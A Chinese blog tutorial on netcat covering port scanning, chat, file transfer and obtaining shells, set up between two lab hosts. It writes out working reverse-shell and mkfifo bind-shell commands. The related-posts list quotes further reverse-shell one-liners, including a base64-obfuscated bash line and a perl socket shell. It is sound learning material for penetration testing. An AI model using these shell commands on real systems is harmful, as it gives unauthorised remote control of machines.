netcat学习笔记

最新推荐文章于 2023-03-26 14:43:44 发布
最新推荐文章于 2023-03-26 14:43:44 发布
阅读量400 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s0mor/article/details/100037797
版权

netcat:

相当于网络中的瑞士军刀,它所做的事情是在两台主机间建立连接并返回两个数据流。

主机A:192.168.12.130
主机B:192.168.12.131

一、端口扫描

扫描主机B开放端口:

nc -zvn 192.168.12.131 1-999

参数:
-u 改变运行模式,默认为TCP,改为UDP
-z 适用于扫描,告诉netcat,连接成功后就关闭连接,不进行数据交换
-v 详细输出
-n 告诉netcat,我只需要对方的IP信息,不需要DNS信息

在这里插入图片描述

二、主机AB间实时通信

server:主机B(192.168.12.131)

nc -l 1234

告诉netcat,在1234端口创建一个TCP服务器。所有标准的输入输出数据都会显示到当前shell上。

client:主机A(192.168.12.130)

nc 192.168.12.131 1234

在这里插入图片描述

三、传输文件

Kali想给Ubuntu传输username.txt文件

Server:192.168.12.131(Ubuntu)

nc -l 1234 > /home/sumor/文档/username.txt

Client:192.168.12.130(Kali)

nc 192.168.12.131 1234 < /root/文档/username.txt

在这里插入图片描述

可以理解为,netcat作为一个中间件,我把文件交给netcat,netcat再传递给目标。箭头的指向来表示文件的传递方向,所以无论是Server还是Client,都可以灵活的将文件传递给对方。

三、获取shell

渗透时,有时无法使用对方的telnet、ssh(对方未安装或权限不够等)

1、如果对方的netcat支持 -c -e 参数的话,可以获取对方的反向shell。

获取反向shell可以一定程度绕过防火墙,比如限制入站连接等。

此时是Server获取Client的shell:

Server:192.168.12.130(Kali)

nc -l 1234

创建监听,守株待兔。

Client:192.168.12.131(Ubuntu)

nc 192.168.12.130 1234 -e /bin/bash

告诉netcat,去连接192.168.12.130的1234端口,如果连接成功,就把自己的/bin/bash(shell)给对方。

2、netcat不支持-e -c 参数时

Server:192.168.12.131(Ubuntu)

mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/tmp_fifo

第一行,创建了一个FIFO文件(即管道,可以在进程间、Server和Client间交互数据而不用创建临时文件)

第二行,读取FIFO文件,然后用了管道命令,将FIFO的输入指向到/bin/sh,即shell上,2>&1中,&1是文件描述符,1表示标准输出,2表示标准错误,所以意思是将标准错误重定向到标准输出,因为前面已经将标准输出定向到了shell上,所以标准错误也会定向到shell。最后用管道命令,告诉netcat在1234端口上创建一个netcat服务器监听,并将获取到的传递过来的内容交给FIFO文件。形成了一个循环。

Client:192.168.12.130(Kali)

nc 192.168.12.131 1234

在这里插入图片描述

s0mor
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透由简入深之netcat 学习
十五年游戏主程转渗透之路
02-27 913
netcat,反向shell,linux io,linux文件描述符
Netcat学习总结
马赛克的博客
03-23 682
一:前言 一般来说,网络管理员对客户端发起的连接服务器请求比较在意,只要是本机开放的1024端口以下都会进行仔细检查。 对服务器发起的请求就没那么在意了,毕竟端口那么多,不可能对每个端口都了解 利用反向连接能减少被网络管理员发现的概率 注:windows版的netcat可以连接Linux版的netcat,Linux版的netcat也可以连接windows版的netcat,两者在参数和程序功...
-/bin/sh: ./XX.sh: not found 嵌入式LINUX系统执行sh脚本错误问题处理
haart的专栏
04-11 2077
命令 ./test2.sh 错误返回 -/bin/sh: ./test2.sh: not found 原因是.sh脚本在windows系统下用记事本文件编写的。不同系统的编码格式引起的。 转行文件的编码格式: 1、确保用户对文件有读写及执行权限 oracle@linux-106:~/RMAN/bin> chmod a+x test.sh 2、然后修改文件格式 (1)使用...
Linux反弹shell方式总结
qq_43936524的博客
12-11 1043
文章目录bash反弹基础知识指令分析 bash反弹 反弹指令: bash -i >& /dev/tcp/ip/port 0>&1 反弹步骤: 在kail上开启7777侦听: nc -lvp 7777 在靶机上输入反弹指令即可反弹成功 基础知识 linux下有三个标准的文件描述符: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2>或2>
Netcat使用教程
Kali与编程
03-26 1772
虽然它的使用方法相对简单,但是它也提供了许多高级功能,可以帮助渗透测试人员更好地进行网络操作。其中,“-w 3”表示设置超时值为3秒,“[server-ip]”指定服务器IP地址,“[port]”指定服务器端口号,“[file-name]”指定要下载的文件名,“[output-file-name]”指定输出文件名。其中,“[target-ip]”指定目标IP地址,“[port]”指定目标端口号。其中,“-l”表示监听模式,“[port]”指定要监听的端口号。其中,“-u”表示使用UDP协议进行通信。
Flink学习笔记.docx
05-07
Flink 学习笔记 Apache Flink 是近年来越来越流行的一款开源大数据计算引擎,它同时支持了批处理和流处理。Flink 的主要特点是它可以实时处理大规模数据,并且可以与其他大数据处理工具集成,例如 Hadoop、Spark 等...
window系统netcat压缩包
01-20
window系统netcat压缩包
netcat详解
12-16
nc这里指NetCat,它在网络工具中有“瑞士军刀”美誉,而文档讲的就是这个的一些介绍和使用
Netcat源码分析和ppt
01-04
Netcat源码分析带中文注释以及Netcat详细分析的ppt ppt内容包含nc的使用方式,nc原理,nc代码结构的拆解以及明文传输的应对方法等
netcat-0.7.1
09-04
netcat被誉为网络安全界的‘瑞士军刀',相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具, 能够直接由其它程序和脚本轻松驱动。
Linux和Windows反弹shell以及变种
SHELLCODE_8BIT的博客
04-07 2361
Linux bash -i >& /dev/tcp/127.0.0.1/2333 0>&1 bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}' Windows
linux———/bin/sh、 /bin/bash、 /bin/dash的区别
热门推荐
夜风的博客
03-01 9万+
bash bash 是一个为GNU计划编写的Unix shell。它的名字是一系列缩写:Bourne-Again SHell — 这是关于Bourne shell(sh)的一个双关语(Bourne again / born again)。Bourne shell是一个早期的重要shell,由史蒂夫·伯恩在1978年前后编写,并同Version 7 Unix一起发布。bash则在1987年由布莱恩·...
netcat使用
weixin_30784141的博客
04-17 640
前言 最近在做渗透测试的时候遇到了端口监听和shell的反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助! Netcat简介 Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话...
Linux nc (netcat) 详解
Gavin的专栏
04-10 3万+
功能说明:强大的网络工具 语  法:nc [-hlnruz][-g网关...>][-G指向器数目>][-i延迟秒数>][-o输出文件>][-p通信端口>][-s来源位址>][-v...][-w超时秒数>][主机名称][通信端口...] 参  数:   -g网关>  设置路由器跃程通信网关,最多可设置8个。   -G指向器数目>  设置来源路由指向器,其数值为4的倍数。   -h   在线
Netcat 介绍及使用
黄晓宇的博客
02-21 2万+
Netcat 介绍 Netcat(简称nc)是一款强大的命令行网络工具,用来在两台机器之间建立TCP/UDP连接,并通过标准的输入输出进行数据的读写 Netcat 安装 大部分的Linux发行版会都会自带Netcat,可以使用nc命令查看系统中是否有安装Netcat $ nc usage: nc [-46AacCDdEFhklMnOortUuvz] [-K tc] [-b boundif] [-i interval] [-p source_port] [--apple-recv-anyif] [--.
Netcat 命令--网络工具中的瑞士军刀
小桥流水的专栏
12-14 1606
如果未安装 nmap,试试 nc/netcat 命令,如下所示。-z 参数用来告诉 nc 报告开放的端口,而不是启动连接。在 nc 命令中使用 -z 参数时,你需要在主机名/ip 后面限定端口的范围和加速其运行: ### 语法 ###### nc -z -v {host-name-here} {port-range-here}nc -z -v host-name-here sshnc -z -v
python反弹shell_Linux下NC反弹shell命令(推荐)
weixin_32223631的博客
02-20 697
本机开启监听:nc -lvnp 4444nc -vvlp 4444目标机器开启反弹bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))...
Linux 命令行中的2>&1究竟是什么意思?
Java_supermanNO1的博客
09-23 1663
点关注,不迷路;持续更新Java架构相关技术及资讯热文!!! 我们在Linux下经常会碰到 nohup command>/dev/null 2>&1 & 这样形式的命令。 首先我们把这条命令大概分解下首先就是一个nohup表示当前用户和系统的回话下的进城忽略响应HUP消息; &是把该命令以后台的job的形式运行; 那么就剩下command>/dev...
如何理解Linux shell中的“2>&1”
applehxb的专栏
03-02 270
前言 有时候我们常看到类似这样的脚本调用: ./test.sh > log.txt 2>&1 这里的2>&1是什么意思?该如何理解? 先说结论:上面的调用表明将./test.sh的输出重定向到log.txt文件中,同时将标准错误也重定向到log.txt文件中。 有何妙用 (如果已经明白是什么作用,可跳过此小节) 上面到底是什么意思呢?我们来看下面的例子,假如有脚本test.sh: #!/bin/bash date #打印当前时间 whil
golang netcat
最新发布
04-11
netcat可以作为客户端或服务器使用,它支持TCP和UDP协议。 作为客户端,netcat可以连接到指定的主机和端口,并发送数据。作为服务器,netcat可以监听指定的端口,并接收来自客户端的连接和数据。 以下是netcat的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值